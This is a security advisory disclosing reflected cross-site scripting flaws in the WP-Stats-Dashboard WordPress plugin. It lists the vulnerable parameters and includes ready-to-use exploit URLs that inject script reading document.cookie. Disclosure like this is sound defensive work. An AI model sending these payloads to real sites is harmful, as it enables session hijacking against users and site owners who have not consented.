Advisory Details: |
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in WP-Stats-Dashboard which could be exploited to perform cross-site scripting attacks.
1) Cross-site scripting (XSS) vulnerabilities in WP-Stats-Dashboard 1.1 The vulnerability exists due to input sanitation error in the "icon", "url", "name", "type", "code" and "username" parameters in wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that register_globals is enabled. Exploitation examples: http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile _type.php?icon=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/wp-content/ plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/wp-content/p lugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/wp-content/ plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/wp-content/ plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/wp-content/ plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&usern ame=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 1.2 The vulnerability exists due to input sanitation error in the "onchange" parameter in wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that register_globals is enabled. Exploitation example: http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select -trend.php?onchange=%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 1.3 The vulnerability exists due to input sanitation error in the "submenu" parameter in wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that register_globals is enabled. Exploitation example: http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submen u.php?submenu[%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E] |
